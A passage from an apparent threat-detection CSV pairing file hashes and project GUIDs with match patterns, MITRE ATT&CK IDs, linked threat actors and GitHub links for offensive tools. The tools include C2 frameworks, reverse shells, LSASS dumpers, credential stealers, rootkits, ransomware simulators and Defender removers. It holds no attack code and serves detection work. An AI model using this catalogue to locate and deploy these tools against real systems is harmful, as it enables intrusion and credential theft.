Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","29301" "*7835f04904af502bf964096d69451a6151ceb600fa2360bb70396054516847e7*",".{0,1000}7835f04904af502bf964096d69451a6151ceb600fa2360bb70396054516847e7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29303" "*783c942169fb6fe2dd984470a470440dd10a1aec09a153759e8d78a95096a8e6*",".{0,1000}783c942169fb6fe2dd984470a470440dd10a1aec09a153759e8d78a95096a8e6.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#filehash","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","29305" "*78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec*",".{0,1000}78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29307" 
"*784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e*",".{0,1000}784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29308" "*784adbcf1820556ae22793a98e8bc802017598d4ee00a63c2c5a735b744009f6*",".{0,1000}784adbcf1820556ae22793a98e8bc802017598d4ee00a63c2c5a735b744009f6.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","29309" "*784F8029-4D72-4363-9638-5A8D11545494*",".{0,1000}784F8029\-4D72\-4363\-9638\-5A8D11545494.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","#GUIDproject","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","29311" "*784f96fcd55e4e19e9178acc0b38fbb1536821a8ffdbf02a1606eec74ef82d4f*",".{0,1000}784f96fcd55e4e19e9178acc0b38fbb1536821a8ffdbf02a1606eec74ef82d4f.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","29312" 
"*785103e26500da6cc70ffbd7aa5edb74b8c8a3d38741fe34bf484108e7a76f46*",".{0,1000}785103e26500da6cc70ffbd7aa5edb74b8c8a3d38741fe34bf484108e7a76f46.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29313" "*7863d0f2b0c532b9f36b62550833049f402a1267b64433b6d5c7e007252ce83f*",".{0,1000}7863d0f2b0c532b9f36b62550833049f402a1267b64433b6d5c7e007252ce83f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29314" "*7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388*",".{0,1000}7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","29315" "*78656dcbb5b795a7e71947b0f45fc054ced091ee2b62a41562879750ff111200*",".{0,1000}78656dcbb5b795a7e71947b0f45fc054ced091ee2b62a41562879750ff111200.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","29316" "*786585f4258b3ba87767b73a7cb8654ba31967264a82c8e60cbc905f81efa24d*",".{0,1000}786585f4258b3ba87767b73a7cb8654ba31967264a82c8e60cbc905f81efa24d.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29317" "*7867f83c0599dc48a1a709b0a0bbfe4f4af72f8cdf14bbae58fdf5e461f1ca26*",".{0,1000}7867f83c0599dc48a1a709b0a0bbfe4f4af72f8cdf14bbae58fdf5e461f1ca26.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29318" "*7870be97747b352f74adf2c6dc96d647240b984517155f46565ce00307df0248*",".{0,1000}7870be97747b352f74adf2c6dc96d647240b984517155f46565ce00307df0248.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29321" "*78733969f8a27a92e4af2c9c835b256fdce1f5f521a5a248e16dafb385a68e6e*",".{0,1000}78733969f8a27a92e4af2c9c835b256fdce1f5f521a5a248e16dafb385a68e6e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29322" "*787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0*",".{0,1000}787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29323" "*7876ba8fb2f4a1e4802f1f2c1030b9bc708f3981264fea33e261be7e05966169*",".{0,1000}7876ba8fb2f4a1e4802f1f2c1030b9bc708f3981264fea33e261be7e05966169.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","#filehash","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","29324" "*78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547*",".{0,1000}78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29325" "*7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07*",".{0,1000}7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29326" "*7898617D-08D2-4297-ADFE-5EDD5C1B828B*",".{0,1000}7898617D\-08D2\-4297\-ADFE\-5EDD5C1B828B.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#GUIDproject","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","29327" "*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*",".{0,1000}789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","29329" "*78a098cf3b91a354d6425bb5c08af4a0cc137a71bec4ad44707d864e263a4384*",".{0,1000}78a098cf3b91a354d6425bb5c08af4a0cc137a71bec4ad44707d864e263a4384.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#filehash","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","29330" "*78a28021014c880da7336b529ed813f42c4a79fdc86d8ad38a579744abfcb71b*",".{0,1000}78a28021014c880da7336b529ed813f42c4a79fdc86d8ad38a579744abfcb71b.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29331" "*78a76b1d3ceef1a911bcf34067fee7546c3ee72d7f68a4a8a2da68812eaab49e*",".{0,1000}78a76b1d3ceef1a911bcf34067fee7546c3ee72d7f68a4a8a2da68812eaab49e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29333" "*78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2*",".{0,1000}78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29334" "*78a924220cf74c45f237414aa61e73f066f175f0cc47649dc0668769941ed305*",".{0,1000}78a924220cf74c45f237414aa61e73f066f175f0cc47649dc0668769941ed305.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#filehash","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","29335" "*78b0faf9c2d4afca5873ccc2f04bf9dbffdf76cf1b854f954d20a7335782ec95*",".{0,1000}78b0faf9c2d4afca5873ccc2f04bf9dbffdf76cf1b854f954d20a7335782ec95.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29337" 
"*78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66*",".{0,1000}78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29338" "*78b4ff5e1bbac4a8bde265705a5c6e36b41bb2a9170f8f060a09bb1552549af2*",".{0,1000}78b4ff5e1bbac4a8bde265705a5c6e36b41bb2a9170f8f060a09bb1552549af2.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","29339" "*78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6*",".{0,1000}78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29340" "*78BB6D02-6E02-4933-89DC-4AD8EE0B303F*",".{0,1000}78BB6D02\-6E02\-4933\-89DC\-4AD8EE0B303F.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","29341" "*78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88*",".{0,1000}78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29342" "*78be236127f4f8c65a8a9818b43e32e33a9107325e14b80f53337cd34b8c53e8*",".{0,1000}78be236127f4f8c65a8a9818b43e32e33a9107325e14b80f53337cd34b8c53e8.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - 
TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#filehash","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","29343" "*78bef84073c09246a6acddeebb63557e60236175afc68408981a517c7e08d326*",".{0,1000}78bef84073c09246a6acddeebb63557e60236175afc68408981a517c7e08d326.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29344" "*78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975*",".{0,1000}78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29345" "*78C76961-8249-4EFE-9DE2-B6EF15A187F7*",".{0,1000}78C76961\-8249\-4EFE\-9DE2\-B6EF15A187F7.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#GUIDproject","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","29346" "*78d6cc62452627889988e7d1d63675ee70a4cea3657631d55afb62467630c954*",".{0,1000}78d6cc62452627889988e7d1d63675ee70a4cea3657631d55afb62467630c954.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","29348" "*78dc269070acbaf7981717c584d983cba142abccb2c7efbd9158015147674e77*",".{0,1000}78dc269070acbaf7981717c584d983cba142abccb2c7efbd9158015147674e77.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29350" "*78DE9716-84E8-4469-A5AE-F3E43181C28B*",".{0,1000}78DE9716\-84E8\-4469\-A5AE\-F3E43181C28B.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","29352" "*78e4019194c23bd123a3bdd40aad7815e0bd1db967adfea97ea3df83084d1467*",".{0,1000}78e4019194c23bd123a3bdd40aad7815e0bd1db967adfea97ea3df83084d1467.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - 
TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29353" "*78e8997b2a146086dbf974c2de541f845ad52ee9de76883cd6d8c76959b026f8*",".{0,1000}78e8997b2a146086dbf974c2de541f845ad52ee9de76883cd6d8c76959b026f8.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29354" "*78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029*",".{0,1000}78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","29356" "*78f555f713f391ee8b47078dab69267e837fffbbdeaa8e46c50be0e6336102f9*",".{0,1000}78f555f713f391ee8b47078dab69267e837fffbbdeaa8e46c50be0e6336102f9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29357" "*78f6b056c337071f720db13a97fab5fec4ff8c4e35714a365bbfdfaaa8bd2afe*",".{0,1000}78f6b056c337071f720db13a97fab5fec4ff8c4e35714a365bbfdfaaa8bd2afe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - 
TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29358" "*78fa6d6f41b506791944c470b4cceb3af184a9c6fcaa804d706763cb9c29b52b*",".{0,1000}78fa6d6f41b506791944c470b4cceb3af184a9c6fcaa804d706763cb9c29b52b.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","29359" "*78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e*",".{0,1000}78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29361" "*79023345917d346447982c87eae5639171d2bc091505dc0869632440bcc250f2*",".{0,1000}79023345917d346447982c87eae5639171d2bc091505dc0869632440bcc250f2.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#filehash","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","29362" 
"*7925b74698a6b8c9a8c0135a6fca700c610b8f97245b61d2949bc2b78c2f74fc*",".{0,1000}7925b74698a6b8c9a8c0135a6fca700c610b8f97245b61d2949bc2b78c2f74fc.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#filehash","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","29366" "*7926cbd1800a74416a6c36bdb022f80a6e217a3952099b5e929f9a183416bf49*",".{0,1000}7926cbd1800a74416a6c36bdb022f80a6e217a3952099b5e929f9a183416bf49.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 